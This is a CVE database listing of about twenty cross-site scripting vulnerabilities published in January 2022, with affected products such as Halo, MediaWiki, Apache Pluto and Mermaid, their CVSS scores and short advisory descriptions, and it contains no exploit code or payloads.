Total
21765 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2022-22124 | 1 Fit2cloud | 1 Halo | 2022-01-14 | 3.5 LOW | 5.4 MEDIUM |
| In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the profile image. An authenticated attacker can upload a carefully crafted SVG file that will trigger arbitrary javascript to run on a victim’s browser. | |||||
| CVE-2021-38895 | 1 Ibm | 1 Security Verify Access | 2022-01-13 | 3.5 LOW | 5.4 MEDIUM |
| IBM Security Verify 10.0.0, 10.0.1.0, and 10.0.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 209563. | |||||
| CVE-2021-46163 | 1 Kentico | 1 Kentico Cms | 2022-01-13 | 4.3 MEDIUM | 6.1 MEDIUM |
| Kentico Xperience 13.0.44 allows XSS via an XML document to the Media Libraries subsystem. | |||||
| CVE-2022-21648 | 1 Nette | 1 Latte | 2022-01-13 | 4.3 MEDIUM | 6.1 MEDIUM |
| Latte is an open source template engine for PHP. Versions since 2.8.0 Latte has included a template sandbox and in affected versions it has been found that a sandbox escape exists allowing for injection into web pages generated from Latte. This may lead to XSS attacks. The issue is fixed in the versions 2.8.8, 2.9.6 and 2.10.8. Users unable to upgrade should not accept template input from untrusted sources. | |||||
| CVE-2021-46146 | 1 Mediawiki | 1 Mediawiki | 2022-01-13 | 3.5 LOW | 5.4 MEDIUM |
| An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. The WikibaseMediaInfo component is vulnerable to XSS via the caption fields for a given media file. | |||||
| CVE-2021-46150 | 1 Mediawiki | 1 Mediawiki | 2022-01-13 | 3.5 LOW | 4.8 MEDIUM |
| An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. Special:CheckUserLog allows CheckUser XSS because of date mishandling, as demonstrated by an XSS payload in MediaWiki:October. | |||||
| CVE-2021-40041 | 1 Huawei | 2 Ws318n-21, Ws318n-21 Firmware | 2022-01-13 | 1.9 LOW | 4.2 MEDIUM |
| There is a Cross-Site Scripting(XSS) vulnerability in HUAWEI WS318n product when processing network settings. Due to insufficient validation of user input, a local authenticated attacker could exploit this vulnerability by injecting special characters. Successful exploit could cause certain information disclosure. Affected product versions include: WS318n-21 10.0.2.2, 10.0.2.5 and 10.0.2.6. | |||||
| CVE-2021-46080 | 1 Vehicle Service Management System Project | 1 Vehicle Service Management System | 2022-01-13 | 3.5 LOW | 4.8 MEDIUM |
| A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability. | |||||
| CVE-2021-36737 | 1 Apache | 1 Pluto | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| The input fields of the Apache Pluto UrlTestPortlet are vulnerable to Cross-Site Scripting (XSS) attacks. Users should migrate to version 3.1.1 of the v3-demo-portlet.war artifact | |||||
| CVE-2020-27428 | 1 Mit | 1 Scratch-svg-renderer | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| A DOM-based cross-site scripting (XSS) vulnerability in Scratch-Svg-Renderer v0.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted sb3 file. | |||||
| CVE-2021-36738 | 1 Apache | 1 Pluto | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| The input fields in the JSP version of the Apache Pluto Applicant MVCBean CDI portlet are vulnerable to Cross-Site Scripting (XSS) attacks. Users should migrate to version 3.1.1 of the applicant-mvcbean-cdi-jsp-portlet.war artifact | |||||
| CVE-2021-36739 | 1 Apache | 1 Pluto | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| The "first name" and "last name" fields of the Apache Pluto 3.1.0 MVCBean JSP portlet maven archetype are vulnerable to Cross-Site Scripting (XSS) attacks. | |||||
| CVE-2021-44584 | 1 Emlog | 1 Emlog | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| Cross-site scripting (XSS) vulnerability in index.php in emlog version <= pro-1.0.7 allows remote attackers to inject arbitrary web script or HTML via the s parameter. | |||||
| CVE-2021-45813 | 1 Slican | 1 Webcti | 2022-01-12 | 4.3 MEDIUM | 6.1 MEDIUM |
| SLICAN WebCTI 1.01 2015 is affected by a Cross Site Scripting (XSS) vulnerability. The attacker can steal the user's session by injecting malicious JavaScript codes which leads to Session Hijacking and cause user's credentials theft. | |||||
| CVE-2022-21650 | 1 Convos | 1 Convos | 2022-01-11 | 3.5 LOW | 5.4 MEDIUM |
| Convos is an open source multi-user chat that runs in a web browser. You can't use SVG extension in Convos' chat window, but you can upload a file with an .html extension. By uploading an SVG file with an html extension the upload filter can be bypassed. This causes Stored XSS. Also, after uploading a file the XSS attack is triggered upon a user viewing the file. Through this vulnerability, an attacker is capable to execute malicious scripts. Users are advised to update as soon as possible. | |||||
| CVE-2021-46074 | 1 Vehicle Service Management System Project | 1 Vehicle Service Management System | 2022-01-11 | 3.5 LOW | 4.8 MEDIUM |
| A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel. | |||||
| CVE-2021-46073 | 1 Vehicle Service Management System Project | 1 Vehicle Service Management System | 2022-01-11 | 3.5 LOW | 4.8 MEDIUM |
| A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel. | |||||
| CVE-2021-42841 | 1 Practo | 1 Insta Hms | 2022-01-11 | 4.3 MEDIUM | 6.1 MEDIUM |
| Insta HMS before 12.4.10 is vulnerable to XSS because of improper validation of user-supplied input by multiple scripts. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. | |||||
| CVE-2021-43861 | 1 Mermaid Project | 1 Mermaid | 2022-01-11 | 3.5 LOW | 5.4 MEDIUM |
| Mermaid is a Javascript based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams. Prior to version 8.13.8, malicious diagrams can run javascript code at diagram readers' machines. Users should upgrade to version 8.13.8 to receive a patch. There are no known workarounds aside from upgrading. | |||||
| CVE-2021-46071 | 1 Vehicle Service Management System Project | 1 Vehicle Service Management System | 2022-01-10 | 3.5 LOW | 4.8 MEDIUM |
| A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel. | |||||